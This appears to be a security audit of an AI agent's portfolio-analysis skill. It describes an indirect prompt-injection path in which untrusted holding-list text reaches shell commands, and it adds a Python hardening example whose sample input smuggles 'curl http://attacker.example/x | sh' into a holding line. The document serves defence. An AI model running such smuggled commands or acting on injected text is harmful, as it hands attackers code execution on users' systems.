portfolio-health-check

Pass

Audited by Gen Agent Trust Hub on Mar 10, 2026

Risk Level: SAFE
Flagged categories: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes data-fetching commands via python ../findata-toolkit-cn/scripts/views_runner.py, so its behavior depends on scripts from the author's broader toolkit that live outside the skill's own directory.
  • [EXTERNAL_DOWNLOADS]: The skill's setup instructions install third-party Python packages from a requirements.txt file located in a sibling directory; that file, and the packages it pulls in, are outside the audited skill.
  • [REMOTE_CODE_EXECUTION]: The skill extends its functionality by executing Python scripts from a path external to its own directory structure (../findata-toolkit-cn/), so whoever controls that sibling directory controls what the skill runs.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection with a command-injection sink: untrusted text from the portfolio holding list is interpolated into the shell commands that invoke the data-fetching tools. Without sanitization, anyone who controls that list (for example, if it is pasted from or fetched out of a document the user did not write) can inject extra shell parameters or commands into the tool invocation.
  • Ingestion points: User-provided 'Holding list' and 'Cash position' collected in SKILL.md (Step 1).
  • Boundary markers: None provided in the prompt logic or script execution instructions; the holding list is not delimited or marked as data.
  • Capability inventory: Subprocess execution of views_runner.py with user-supplied arguments, as seen in references/data-queries.md.
  • Sanitization: None specified. The user-provided ticker symbols and quantities are not validated, escaped, or filtered before command execution.
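The following is an added example, not code from the skill or from the findata-toolkit-cn project, showing the difference between the pattern the audit describes (raw holding text interpolated into a shell string) and a hardened invocation. The path mirrors the one named in the findings; the command-line interface of views_runner.py (a repeated "--holding TICKER:QTY" flag) and the "TICKER QTY" line format of the holding list are assumptions of this example.

```python
import re
import subprocess
from decimal import Decimal, InvalidOperation
from pathlib import Path
from typing import List, Optional, Tuple

# Path mirrors the relative location the audit names. The "--holding" flag is an
# assumption of this example, not the toolkit's documented interface.
VIEWS_RUNNER = Path("../findata-toolkit-cn/scripts/views_runner.py")

# Allow-list for symbols: 1-6 uppercase letters or digits, optionally followed by
# an exchange suffix such as ".HK" or ".SZ". Everything else is rejected, which
# rules out shell metacharacters, embedded whitespace and path fragments.
TICKER_RE = re.compile(r"[A-Z0-9]{1,6}(?:\.[A-Z]{1,4})?")


class HoldingError(ValueError):
    """Raised when a line of the holding list fails validation."""


def parse_holding(line: str) -> Tuple[str, Decimal]:
    """Parse one 'TICKER QTY' line into a validated (ticker, quantity) pair."""
    parts = line.split()
    if len(parts) != 2:
        raise HoldingError(f"expected 'TICKER QTY', got {line!r}")
    ticker, qty_text = parts
    if not TICKER_RE.fullmatch(ticker):
        raise HoldingError(f"invalid ticker {ticker!r}")
    try:
        qty = Decimal(qty_text)
    except InvalidOperation:
        raise HoldingError(f"invalid quantity {qty_text!r}") from None
    # is_finite() is checked first: ordering comparisons on NaN would raise.
    if not qty.is_finite() or qty <= 0:
        raise HoldingError(f"quantity must be a positive number, got {qty_text!r}")
    return ticker, qty


def rejection_reason(line: str) -> Optional[str]:
    """Return why a holding line is rejected, or None if it is acceptable."""
    try:
        parse_holding(line)
    except HoldingError as exc:
        return str(exc)
    return None


def unsafe_command(line: str) -> str:
    """The pattern the audit describes: raw holding text interpolated into a
    shell string. Run with shell=True, 'MSFT 5; curl http://attacker.example/x'
    invokes the toolkit and then curl. Shown only to contrast with build_argv()."""
    return f"python {VIEWS_RUNNER} --holding {line}"


def build_argv(holding_lines: List[str]) -> List[str]:
    """Hardened form: validate every line, then pass arguments as a list so no
    shell ever parses them. Any bad line aborts the whole batch."""
    argv = ["python", str(VIEWS_RUNNER)]
    for line in holding_lines:
        ticker, qty = parse_holding(line)
        argv += ["--holding", f"{ticker}:{qty}"]
    return argv


def run_views(holding_lines: List[str]) -> subprocess.CompletedProcess:
    """Invoke the toolkit without a shell. Not exercised offline (the script is
    not present here); build_argv() is the part worth testing."""
    return subprocess.run(build_argv(holding_lines), shell=False,
                          check=True, capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed sample: two legitimate holdings and one injection attempt.
    sample = ["AAPL 10", "0700.HK 200", "MSFT 5; curl http://attacker.example/x | sh"]
    for entry in sample:
        print(f"{entry!r}: {rejection_reason(entry) or 'ok'}")
    print(build_argv(sample[:2]))
```

The two controls are independent: the allow-list rejects anything that is not a plausible symbol and quantity, and the argv list means that even a value which slipped past validation is delivered to views_runner.py as a single argument rather than parsed by a shell. Neither replaces a check of what the toolkit itself does with the argument once it receives it.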
Audit Metadata
Risk Level: SAFE
Analyzed: Mar 10, 2026, 03:23 AM